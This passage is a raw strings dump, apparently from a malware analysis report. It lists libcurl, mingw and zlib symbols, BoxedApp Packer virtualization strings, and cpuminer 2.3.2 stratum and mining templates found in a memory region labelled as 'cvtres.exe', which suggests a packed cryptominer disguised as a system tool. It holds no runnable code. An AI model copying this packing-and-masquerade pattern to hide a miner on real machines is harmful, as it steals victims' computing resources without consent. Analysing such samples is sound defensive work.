resolve "%s" for SOCKS4 connect.</pre><pre>SOCKS4%s request granted.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.</pre><pre>Establish HTTP proxy tunnel to %s:%hu</pre><pre>%s:%hu</pre><pre>%s%s%s:%hu</pre><pre>Host: %s</pre><pre>CONNECT %s HTTP/%s</pre><pre>%s%s%s%s</pre><pre>HTTP/1.%d %d</pre><pre>TUNNEL_STATE switched to: %d</pre><pre>Received HTTP code %d from proxy after CONNECT</pre><pre>%s/%s</pre><pre>username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s</pre><pre>00000001</pre><pre>12345678</pre><pre>%s xxxxxxxxxxxxxxxx</pre><pre>- Conn %d (%p) send_pipe: %d, recv_pipe: %d</pre><pre>Server %s is blacklisted</pre><pre>Server %s is not blacklisted</pre><pre>Site %s:%d is pipeline blacklisted</pre><pre>Adding handle: send: %d</pre><pre>Adding handle: recv: %d</pre><pre>Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d</pre><pre>curl_easy_duphandle</pre><pre>curl_easy_escape</pre><pre>curl_easy_getinfo</pre><pre>curl_easy_pause</pre><pre>curl_easy_recv</pre><pre>curl_easy_send</pre><pre>curl_easy_strerror</pre><pre>curl_easy_unescape</pre><pre>curl_escape</pre><pre>curl_formadd</pre><pre>curl_formfree</pre><pre>curl_formget</pre><pre>curl_free</pre><pre>curl_getdate</pre><pre>curl_getenv</pre><pre>curl_global_cleanup</pre><pre>curl_global_init_mem</pre><pre>curl_maprintf</pre><pre>curl_mfprintf</pre><pre>curl_mprintf</pre><pre>curl_msnprintf</pre><pre>curl_msprintf</pre><pre>curl_multi_add_handle</pre><pre>curl_multi_assign</pre><pre>curl_multi_cleanup</pre><pre>curl_multi_fdset</pre><pre>curl_multi_info_read</pre><pre>curl_multi_init</pre><pre>curl_multi_perform</pre><pre>curl_multi_remove_handle</pre><pre>curl_multi_setopt</pre><pre>curl_multi_socket</pre><pre>curl_multi_socket_action</pre><pre>curl_multi_socket_all</pre><pre>curl_multi_strerror</pre><pre>curl_multi_timeout</pre><pre>curl_multi_wait</pre><pre>curl_mvaprintf</pre><pre>curl_mvfprintf</pre><pre>curl_mvprintf</pre><pre>curl_mvsnprintf</pre><pre>curl_mvsprintf</pre><pre>curl_share_cleanup</pre><pre>curl_share_init</pre><pre>curl_share_setopt</pre><pre>curl_share_strerror</pre><pre>curl_strequal</pre><pre>curl_strnequal</pre><pre>curl_unescape</pre><pre>curl_version_info</pre><pre>ADVAPI32.DLL</pre><pre>WS2_32.DLL</pre><pre>zlib1.dll</pre><pre>8 8$8(8,808</pre><pre>2 2$2(2,2024282</pre><pre>DllMainCRTStartup</pre><pre>GNU C 4.2.1-sjlj (mingw32-2)</pre><pre>/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c</pre><pre> DllMainCRTStartup@12</pre><pre>dllcrt1.c</pre><pre>.file</pre><pre>http.c</pre><pre>ftp.c</pre><pre>url.c</pre><pre>_Curl_do</pre><pre>curl_fnmatch.c</pre><pre>ftplistparser.c</pre><pre>http_chunks.c</pre><pre>http_digest.c</pre><pre>curl_rand.c</pre><pre>http_negotiate.c</pre><pre>tftp.c</pre><pre>ssh.c</pre><pre>curl_addrinfo.c</pre><pre>curl_sspi.c</pre><pre>curl_memrchr.c</pre><pre>smtp.c</pre><pre>curl_threads.c</pre><pre>curl_rtmp.c</pre><pre>curl_gethostname.c</pre><pre>http_proxy.c</pre><pre>curl_gssapi.c</pre><pre>curl_ntlm.c</pre><pre>curl_ntlm_wb.c</pre><pre>curl_ntlm_core.c</pre><pre>curl_ntlm_msgs.c</pre><pre>curl_sasl.c</pre><pre>curl_schannel.c</pre><pre>curl_multibyte.c</pre><pre>curl_darwinssl.c</pre><pre>pipeline.c</pre><pre>.idata$7</pre><pre>.idata$5</pre><pre>.idata$48</pre><pre>.idata$6</pre><pre>.idata$4(</pre><pre>.idata$4,</pre><pre>.idata$44</pre><pre>.idata$40</pre><pre>.idata$4</pre><pre>.idata$7`</pre><pre>.idata$7\</pre><pre>.idata$7l</pre><pre>.idata$4</pre><pre>.idata$7x</pre><pre>.idata$6|</pre><pre>.idata$6T</pre><pre>.idata$7|</pre><pre>.idata$7d</pre><pre>.idata$7t</pre><pre>.idata$6d</pre><pre>.idata$6D</pre><pre>.idata$64</pre><pre>.idata$7h</pre><pre>.idata$7p</pre><pre>.idata$6l</pre><pre>.idata$6$</pre><pre>.idata$2P</pre><pre>.idata$5|</pre><pre>.idata$4$</pre><pre>.idata$6(</pre><pre>.idata$6P</pre><pre>.idata$60</pre><pre>.idata$68</pre><pre>.idata$2(</pre><pre>.idata$4`</pre><pre>.idata$6h</pre><pre>.idata$4L</pre><pre>.idata$6\</pre><pre>.idata$5@</pre><pre>.idata$7(</pre><pre>.idata$5P</pre><pre>.idata$7H</pre><pre>.idata$5p</pre><pre>.idata$6t</pre><pre>.idata$7D</pre><pre>.idata$5l</pre><pre>.idata$5<</pre><pre>.idata$4@</pre><pre>.idata$4H</pre><pre>.idata$6,</pre><pre>.idata$5</pre><pre>.idata$4l</pre><pre>.idata$4T</pre><pre>.idata$7<</pre><pre>.idata$5d</pre><pre>.idata$74</pre><pre>.idata$5\</pre><pre>.idata$6<</pre><pre>.idata$4<</pre><pre>.idata$5D</pre><pre>.idata$7,</pre><pre>.idata$5T</pre><pre>.idata$5,</pre><pre>.idata$4x</pre><pre>.idata$5$</pre><pre>.idata$4p</pre><pre>.idata$78</pre><pre>.idata$5`</pre><pre>.idata$6H</pre><pre>.idata$4h</pre><pre>.idata$5(</pre><pre>.idata$4t</pre><pre>.idata$7</pre><pre>.idata$5H</pre><pre>.idata$7@</pre><pre>.idata$5h</pre><pre>.idata$6`</pre><pre>.idata$70</pre><pre>.idata$5X</pre><pre>.idata$4X</pre><pre>.idata$58</pre><pre>.idata$4D</pre><pre>.idata$4P</pre><pre>.idata$50</pre><pre>.idata$4|</pre><pre>.idata$7$</pre><pre>.idata$5L</pre><pre>.idata$4\</pre><pre>.idata$4d</pre><pre>.idata$7L</pre><pre>.idata$5t</pre><pre>.idata$54</pre><pre>.idata$2<</pre><pre>.idata$5x</pre><pre>.idata$7P</pre><pre>.idata$6p</pre><pre>.idata$7T</pre><pre>.idata$2</pre><pre>.idata$7X</pre><pre>.idata$6X</pre><pre>.idata$6</pre><pre>.idata$2d</pre><pre>.debug_aranges</pre><pre>.debug_pubnames</pre><pre>.debug_info</pre><pre>.debug_abbrev</pre><pre>.debug_line</pre><pre>.debug_frame</pre><pre>.debug_loc</pre><pre>_DllMainCRTStartup@12</pre><pre>_curlx_tvdiff</pre><pre>_curlx_tvdiff_secs</pre><pre>_Curl_tvlong</pre><pre>_curlx_tvnow</pre><pre>_Curl_base64_encode</pre><pre>_Curl_base64_decode</pre><pre>_Curl_num_addresses</pre><pre>_Curl_resolv_unlock</pre><pre>_Curl_hostcache_clean</pre><pre>_Curl_hostcache_destroy</pre><pre>_Curl_mk_dnscache</pre><pre>_Curl_hostcache_prune</pre><pre>_Curl_cache_addr</pre><pre>_Curl_loadhostpairs</pre><pre>_Curl_resolv</pre><pre>_Curl_resolv_timeout</pre><pre>_Curl_printable_address</pre><pre>_Curl_global_host_cache_dtor</pre><pre>_Curl_global_host_cache_init</pre><pre>_Curl_pgrsSetDownloadCounter</pre><pre>_Curl_pgrsSetUploadCounter</pre><pre>_Curl_pgrsSetDownloadSize</pre><pre>_Curl_pgrsSetUploadSize</pre><pre>_Curl_pgrsResetTimesSizes</pre><pre>_Curl_pgrsStartNow</pre><pre>_Curl_pgrsUpdate</pre><pre>_Curl_pgrsDone</pre><pre>_Curl_pgrsTime</pre><pre>_Curl_formclean</pre><pre>_curl_formfree</pre><pre>_Curl_FormInit</pre><pre>_Curl_formpostheader</pre><pre>_Curl_FormReader</pre><pre>_Curl_getformdata</pre><pre>_curl_formget</pre><pre>_curl_formadd</pre><pre>_Curl_cookie_freelist</pre><pre>_Curl_cookie_clearall</pre><pre>_Curl_cookie_clearsess</pre><pre>_Curl_cookie_cleanup</pre><pre>_Curl_cookie_list</pre><pre>_Curl_cookie_getlist</pre><pre>_Curl_cookie_add</pre><pre>_Curl_cookie_init</pre><pre>_Curl_cookie_loadfiles</pre><pre>_Curl_flush_cookies</pre><pre>_http_should_fail</pre><pre>_Curl_add_buffer_init</pre><pre>_http_getsock_do</pre><pre>_use_http_1_1</pre><pre>_Curl_add_buffer</pre><pre>_checkhttpprefix</pre><pre>_Curl_checkheaders</pre><pre>_Curl_compareheader</pre><pre>_http_perhapsrewind</pre><pre>_Curl_http_auth_act</pre><pre>_Curl_http_done</pre><pre>_Curl_http_connect</pre><pre>_Curl_add_bufferf</pre><pre>_Curl_add_timecondition</pre><pre>_Curl_add_custom_headers</pre><pre>_Curl_add_buffer_send</pre><pre>_Curl_http_input_auth</pre><pre>_Curl_http_output_auth</pre><pre>_Curl_http</pre><pre>_Curl_http_readwrite_headers</pre><pre>_Curl_write</pre><pre>_Curl_debug</pre><pre>_Curl_read</pre><pre>_Curl_read_plain</pre><pre>_Curl_sendf</pre><pre>_Curl_failf</pre><pre>_Curl_client_write</pre><pre>_Curl_recv_plain</pre><pre>_Curl_send_plain</pre><pre>_Curl_write_plain</pre><pre>_Curl_infof</pre><pre>_Curl_freeset</pre><pre>_Curl_init_userdefined</pre><pre>_Curl_protocol_getsock</pre><pre>_Curl_doing_getsock</pre><pre>_Curl_protocol_connecting</pre><pre>_Curl_protocol_doing</pre><pre>_Curl_reset_reqproto</pre><pre>_Curl_do_more</pre><pre>_Curl_verboseconnect</pre><pre>_Curl_isPipeliningEnabled</pre><pre>_IsPipeliningPossible</pre><pre>_parse_remote_port</pre><pre>_Curl_open</pre><pre>_Curl_protocol_connect</pre><pre>_Curl_connected_proxy</pre><pre>_Curl_setup_conn</pre><pre>_Curl_removeHandleFromPipeline</pre><pre>_Curl_getoff_all_pipelines</pre><pre>_Curl_addHandleToPipeline</pre><pre>_signalPipeClose</pre><pre>_Curl_disconnect</pre><pre>_Curl_done</pre><pre>_Curl_handler_dummy</pre><pre>_Curl_connect</pre><pre>_Curl_setopt</pre><pre>_Curl_close</pre><pre>_Curl_dupset</pre><pre>_Curl_if_is_interface_name</pre><pre>_Curl_if2ip</pre><pre>_Curl_speedcheck</pre><pre>_Curl_speedinit</pre><pre>_curl_version_info</pre><pre>_curl_version</pre><pre>_curl_getenv</pre><pre>_curl_free</pre><pre>_Curl_urldecode</pre><pre>_curl_easy_unescape</pre><pre>_curl_unescape</pre><pre>_curl_easy_escape</pre><pre>_curl_escape</pre><pre>_curl_msnprintf</pre><pre>_curl_mvfprintf</pre><pre>_curl_mvprintf</pre><pre>_curl_mvsprintf</pre><pre>_curl_mfprintf</pre><pre>_curl_mprintf</pre><pre>_curl_msprintf</pre><pre>_curl_mvaprintf</pre><pre>_curl_maprintf</pre><pre>_curl_mvsnprintf</pre><pre>_Curl_parsenetrc</pre><pre>_Curl_initinfo</pre><pre>_Curl_getinfo</pre><pre>_Curl_single_getsock</pre><pre>_Curl_sleep_time</pre><pre>_Curl_posttransfer</pre><pre>_strlen_url</pre><pre>_strcpy_url</pre><pre>_Curl_setup_transfer</pre><pre>_Curl_meets_timecondition</pre><pre>_Curl_reconnect_request</pre><pre>_Curl_follow</pre><pre>_Curl_pretransfer</pre><pre>_Curl_readrewind</pre><pre>_Curl_retry_request</pre><pre>_Curl_fillreadbuffer</pre><pre>_Curl_readwrite</pre><pre>_curl_strnequal</pre><pre>_curl_strequal</pre><pre>_Curl_easy_addmulti</pre><pre>_curl_easy_send</pre><pre>_curl_easy_recv</pre><pre>_curl_easy_pause</pre><pre>_Curl_easy_initHandleData</pre><pre>_curl_easy_reset</pre><pre>_curl_easy_duphandle</pre><pre>_curl_easy_getinfo</pre><pre>_curl_easy_cleanup</pre><pre>_curl_easy_perform</pre><pre>_curl_easy_setopt</pre><pre>_curl_global_cleanup</pre><pre>_curl_global_init</pre><pre>_curl_easy_init</pre><pre>_curl_global_init_mem</pre><pre>_Curl_fnmatch</pre><pre>_Curl_fileinfo_dtor</pre><pre>_Curl_fileinfo_alloc</pre><pre>_Curl_wildcard_dtor</pre><pre>_Curl_wildcard_init</pre><pre>_Curl_httpchunk_init</pre><pre>_Curl_httpchunk_read</pre><pre>_Curl_strtok_r</pre><pre>_Curl_persistconninfo</pre><pre>_Curl_socket</pre><pre>_Curl_closesocket</pre><pre>_Curl_getconnectinfo</pre><pre>_Curl_timeleft</pre><pre>_Curl_sndbufset</pre><pre>_Curl_connecthost</pre><pre>_Curl_updateconninfo</pre><pre>_Curl_is_connected</pre><pre>_Curl_llist_alloc</pre><pre>_Curl_llist_insert_next</pre><pre>_Curl_llist_remove</pre><pre>_Curl_llist_destroy</pre><pre>_Curl_llist_count</pre><pre>_Curl_llist_move</pre><pre>_Curl_hash_pick</pre><pre>_Curl_hash_str</pre><pre>_Curl_hash_start_iterate</pre><pre>_Curl_hash_next_element</pre><pre>_Curl_str_key_compare</pre><pre>_Curl_hash_clean_with_criterium</pre><pre>_Curl_hash_delete</pre><pre>_Curl_hash_clean</pre><pre>_Curl_hash_destroy</pre><pre>_Curl_hash_add</pre><pre>_Curl_hash_init</pre><pre>_Curl_hash_alloc</pre><pre>_fd_key_compare</pre><pre>_multi_freeamsg</pre><pre>_Curl_multi_pipeline_enabled</pre><pre>_Curl_multi_handlePipeBreak</pre><pre>_Curl_multi_set_easy_connection</pre><pre>_Curl_multi_max_host_connections</pre><pre>_Curl_multi_max_total_connections</pre><pre>_Curl_multi_max_pipeline_length</pre><pre>_Curl_multi_content_length_penalty_size</pre><pre>_Curl_multi_chunk_length_penalty_size</pre><pre>_Curl_multi_pipelining_site_bl</pre><pre>_Curl_multi_pipelining_server_bl</pre><pre>_curl_multi_assign</pre><pre>_Curl_expire</pre><pre>_Curl_multi_process_pending_handles</pre><pre>_curl_multi_timeout</pre><pre>_curl_multi_fdset</pre><pre>_curl_multi_setopt</pre><pre>_curl_multi_info_read</pre><pre>_curl_multi_cleanup</pre><pre>_curl_multi_perform</pre><pre>_curl_multi_socket_all</pre><pre>_curl_multi_socket_action</pre><pre>_curl_multi_socket</pre><pre>_curl_multi_wait</pre><pre>_curl_multi_remove_handle</pre><pre>_curl_multi_add_handle</pre><pre>_curl_multi_init</pre><pre>_Curl_unencode_cleanup</pre><pre>_Curl_unencode_gzip_write</pre><pre>_Curl_unencode_deflate_write</pre><pre>_curl_share_init</pre><pre>_Curl_share_lock</pre><pre>_Curl_share_unlock</pre><pre>_curl_share_cleanup</pre><pre>_curl_share_setopt</pre><pre>_Curl_digest_cleanup</pre><pre>_Curl_output_digest</pre><pre>_Curl_input_digest</pre><pre>_Curl_MD5_init</pre><pre>_Curl_MD5_update</pre><pre>_Curl_MD5_final</pre><pre>_Curl_md5it</pre><pre>_Curl_rand</pre><pre>_Curl_srand</pre><pre>_Curl_inet_pton</pre><pre>_curl_easy_strerror</pre><pre>_curl_multi_strerror</pre><pre>_curl_share_strerror</pre><pre>_Curl_strerror</pre><pre>_Curl_ipvalid</pre><pre>_Curl_ipv4_resolve_r</pre><pre>_Curl_getaddrinfo</pre><pre>_Curl_set_dns_servers</pre><pre>_Curl_inet_ntop</pre><pre>_Curl_gmtime</pre><pre>_curl_getdate</pre><pre>_Curl_wait_ms</pre><pre>_Curl_poll</pre><pre>_Curl_socket_check</pre><pre>_Curl_clone_ssl_config</pre><pre>_Curl_free_ssl_config</pre><pre>_Curl_ssl_config_matches</pre><pre>_Curl_splay</pre><pre>_Curl_splayinsert</pre><pre>_KEY_NOTUSED.17658</pre><pre>_Curl_splaygetbest</pre><pre>_Curl_splayremovebyaddr</pre><pre>_Curl_blockread_all</pre><pre>_Curl_SOCKS5</pre><pre>_Curl_SOCKS4</pre><pre>_Curl_raw_toupper</pre><pre>_Curl_raw_equal</pre><pre>_Curl_raw_nequal</pre><pre>_Curl_strntoupper</pre><pre>_Curl_freeaddrinfo</pre><pre>_Curl_he2ai</pre><pre>_Curl_ip2addr</pre><pre>_Curl_str2addr</pre><pre>_curl_slist_append</pre><pre>_curl_slist_free_all</pre><pre>_Curl_slist_duplicate</pre><pre>_curlx_nonblock</pre><pre>_Curl_memrchr</pre><pre>_curlx_ultous</pre><pre>_curlx_ultouc</pre><pre>_curlx_ultosi</pre><pre>_curlx_uztosi</pre><pre>_curlx_uztoul</pre><pre>_curlx_uztoui</pre><pre>_curlx_sltosi</pre><pre>_curlx_sltoui</pre><pre>_curlx_sltous</pre><pre>_curlx_uztosz</pre><pre>_curlx_sotouz</pre><pre>_curlx_sztosi</pre><pre>_curlx_sitouz</pre><pre>_curlx_sktosi</pre><pre>_curlx_sitosk</pre><pre>_Curl_HMAC_init</pre><pre>_Curl_HMAC_update</pre><pre>_Curl_HMAC_final</pre><pre>_Curl_gethostname</pre><pre>http_negotiate_sspi.c</pre><pre>_Curl_proxyCONNECT</pre><pre>_Curl_proxy_connect</pre><pre>_Curl_sasl_cleanup</pre><pre>_Curl_sasl_create_login_message</pre><pre>_sasl_digest_get_key_value</pre><pre>_Curl_sasl_create_digest_md5_message</pre><pre>_Curl_sasl_create_cram_md5_message</pre><pre>_Curl_sasl_create_plain_message</pre><pre>_Curl_bundle_remove_conn</pre><pre>_Curl_bundle_add_conn</pre><pre>_Curl_bundle_destroy</pre><pre>_Curl_bundle_create</pre><pre>_Curl_conncache_find_first_connection</pre><pre>_Curl_conncache_foreach</pre><pre>_Curl_conncache_remove_conn</pre><pre>_Curl_conncache_find_bundle</pre><pre>_Curl_conncache_add_conn</pre><pre>_Curl_conncache_destroy</pre><pre>_Curl_conncache_init</pre><pre>_print_pipeline</pre><pre>_Curl_pipeline_set_server_blacklist</pre><pre>_Curl_pipeline_server_blacklisted</pre><pre>_Curl_pipeline_set_site_blacklist</pre><pre>_Curl_pipeline_site_blacklisted</pre><pre>_Curl_move_handle_from_send_to_recv_pipe</pre><pre>_Curl_add_handle_to_pipeline</pre><pre>_Curl_pipeline_penalized</pre><pre>.weak.__Jv_RegisterClasses.___gcc_register_frame</pre><pre>__libmsvcrt_a_iname</pre><pre>_Curl_handler_http</pre><pre>___crt_xl_start__</pre><pre>___crt_xi_start__</pre><pre>___crt_xi_end__</pre><pre>_Curl_crealloc</pre><pre>_Curl_cfree</pre><pre>_Curl_HMAC_MD5</pre><pre>_Curl_wkday</pre><pre>___crt_xp_start__</pre><pre>_Curl_handler_file</pre><pre>___crt_xp_end__</pre><pre>__head_libmsvcrt_a</pre><pre>_Curl_ccalloc</pre><pre>___crt_xc_end__</pre><pre>___crt_xc_start__</pre><pre>_Curl_DIGEST_MD5</pre><pre>_Curl_cmalloc</pre><pre>_Curl_month</pre><pre>_Curl_cstrdup</pre><pre>___crt_xt_start__</pre><pre>_Curl_cwcsdup</pre><pre>___crt_xt_end__</pre><pre>_Curl_ack_eintr</pre><pre>0`.data</pre><pre>0@.bss</pre><pre>%XQIb</pre><pre>%dQIb</pre><pre>%DQIb</pre><pre>%xQIb</pre><pre>libgcc_s_dw2-1.dll</pre><pre>\QUSEREX.DLL</pre><pre>pthread_key_create</pre><pre>pthread_key_delete</pre><pre>7(8.898?8</pre><pre>_CRT_MT</pre><pre>___w64_mingwthr_add_key_dtor</pre><pre>___w64_mingwthr_remove_key_dtor</pre><pre>__mingwthr_key_t</pre><pre>__mingwthr_key</pre><pre>GNU C 4.5.2</pre><pre>../mingw/dllcrt1.c</pre><pre>C:\MinGW\msys\1.0\src\mingwrt</pre><pre>-DllMainCRTStartup@12</pre><pre>__report_error</pre><pre>../mingw/crtst.c</pre><pre>__mingwthr_run_key_dtors</pre><pre>keyp</pre><pre>new_key</pre><pre>prev_key</pre><pre>cur_key</pre><pre>key_dtor_list</pre><pre>c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include</pre><pre>crtst.c</pre><pre>cygming-crtbegin.c</pre><pre>.tls$AAA</pre><pre>.tls$ZZZ</pre><pre>.CRT$XLA</pre><pre>.CRT$XLZ</pre><pre>.CRT$XLC</pre><pre>.CRT$XLD</pre><pre>.CRT$XDA</pre><pre>.CRT$XDZ</pre><pre>.idata$6N</pre><pre>.idata$6j</pre><pre>.idata$62</pre><pre>.idata$6V</pre><pre>.idata$6~</pre><pre>.idata$6*</pre><pre>.idata$6f</pre><pre>.idata$6@</pre><pre>.idata$6></pre><pre>cygming-crtend.c</pre><pre>__CRT_MT</pre><pre>.eh_frame</pre><pre>.debug_pubtypes</pre><pre>.debug_str</pre><pre>.debug_ranges</pre><pre>_pthread_key_create</pre><pre>_pthread_key_delete</pre><pre>_ptw32_processTerminate.part.1</pre><pre>_pthread_join</pre><pre>___report_error</pre><pre>___mingwthr_run_key_dtors</pre><pre>_key_dtor_list</pre><pre>____w64_mingwthr_add_key_dtor</pre><pre>____w64_mingwthr_remove_key_dtor</pre><pre>.text.startup</pre><pre>.ctors.65535</pre><pre>.weak.___register_frame_info.___gcc_register_frame</pre><pre>_ptw32_selfThreadKey</pre><pre>_ptw32_cleanupKey</pre><pre>.weak.___deregister_frame_info.___gcc_register_frame</pre><pre>deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler</pre><pre>b<fd:%d></fd:%d></pre><pre>inflate 1.2.8 Copyright 1995-2013 Mark Adler</pre><pre>%9X9i9z9</pre><pre>"@"@"@"@</pre><pre>This EXE is created by the demo version of BoxedApp Packer</pre><pre>Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html</pre><pre>WBoxedAppLog_%d.txt</pre><pre>BoxedAppVar:ExeFileName</pre><pre>BoxedAppVar:ExeFileExtension</pre><pre>BoxedAppVar:ExeFileNameWithoutExtension</pre><pre>BoxedAppVar:ExeFullPath</pre><pre>BoxedAppVar:OldCmdLine</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>HKEY_USERS</pre><pre>%s\%s</pre><pre>%s\winsxs\tempBxDir\virtualAsm</pre><pre>:\tempManifest.manifest</pre><pre>%s_%.8x_%.8x_%.8x</pre><pre>\KernelBase.dll</pre><pre>\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll</pre><pre>%d-%d-%p</pre><pre>:\TLSSupport310D39B571B74d36B95451DD240D8758</pre><pre>",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>\rundll32.exe"</pre><pre>DotNetAppDomainManager.CManagedHost</pre><pre>BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1</pre><pre>DotNetAppDomainManager.CAppDomainManager</pre><pre>.config</pre><pre>.manifest</pre><pre>",BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>Attempt to launch not executable file:</pre><pre>Unable to find appropriate template exe</pre><pre>comdlg32.dll</pre><pre>\dllhost.exe</pre><pre>hh.exe</pre><pre>find.exe</pre><pre>help.exe</pre><pre>winver.exe</pre><pre>regsvr32.exe</pre><pre>dllhost.exe</pre><pre>ntvdm.exe</pre><pre>tcpsvcs.exe</pre><pre>mpr.dll</pre><pre>Wadvapi32.dll</pre><pre>sxs.dll</pre><pre>Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html</pre><pre>%s_%.8x_%.8x</pre><pre>%s_%.8x</pre><pre>boxedapp_msg_process</pre><pre>boxedapp_event_newmsg</pre><pre>boxedapp_msg_global</pre><pre>bxsdk64.dll</pre><pre>:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\</pre><pre>\DosDevices\pipe\</pre><pre>\Device\NamedPipe\</pre><pre>\??\pipe\</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates</pre><pre>\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates</pre><pre>publicKeyToken</pre><pre>Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\</pre><pre>!"#$%&'()* ,-./0123456789:;<=>?@</pre><pre>3, 3, 5, 0</pre><pre>BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.</pre><pre>BoxedAppSDK.dll</pre><pre><BoxedAppVar:OldCmdLine></BoxedAppVar:OldCmdLine></pre><pre><ExeDir></ExeDir></pre><pre><ExeDir>\libcurl-4.dll</ExeDir></pre><pre>!"#$%&'()* ,-./0123456789:</pre><pre>pthreadgc2.dll</pre><pre><ExeDir>\pthreadgc2.dll</ExeDir></pre><pre>POSIX Threads for Windows LPGL</pre><pre>2, 9, 1, 0</pre><pre>pthreadGC2.DLL</pre><pre>http://sourceware.org/pthreads-win32/</pre><pre><ExeDir>\zlib1.dll</ExeDir></pre><pre>For more information visit http://www.zlib.net/</pre><b>cvtres.exe_3500_rwx_00400000_00177000:</b><pre>.text</pre><pre>``.data</pre><pre>.rdata</pre><pre>`@.bss</pre><pre>.idata</pre><pre>.main</pre><pre>.bxpck</pre><pre>66665\\\\</pre><pre>\\\\5\\\\</pre><pre>666656666</pre><pre>libgcj-12.dll</pre><pre>JSON decode of %s failed</pre><pre>http://</pre><pre>https://</pre><pre>stratum tcp://</pre><pre>http://%s</pre><pre>cpuminer 2.3.2</pre><pre>accepted: %lu/%lu (%.2f%%), %s khash/s %s</pre><pre>DEBUG: reject reason: %s</pre><pre>DEBUG: job_id='%s' extranonce2=%s ntime=x</pre><pre>Starting Stratum on %s</pre><pre>...terminating workio thread</pre><pre>...retry after %d seconds</pre><pre>JSON decode failed(%d): %s</pre><pre>{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}</pre><pre>{"method": "getwork", "params": [ "%s" ], "id":1}</pre><pre>JSON key '%s' not found</pre><pre>JSON key '%s' is not a string</pre><pre>CURL initialization failed</pre><pre>%s%s%s</pre><pre>Long-polling activated for %s</pre><pre>json_rpc_call failed, retry after %d seconds</pre><pre>DEBUG: got new work in %d ms</pre><pre>Binding thread %d to cpu %d</pre><pre>thread %d: %lu hashes, %s khash/s</pre><pre>Total: %s khash/s</pre><pre>work retrieval failed, exiting mining thread %d</pre><pre>http://127.0.0.1:9332/</pre><pre>%s: unsupported non-option argument '%s'</pre><pre>JSON option %s invalid</pre><pre>https:</pre><pre>%s:%s</pre><pre>thread %d 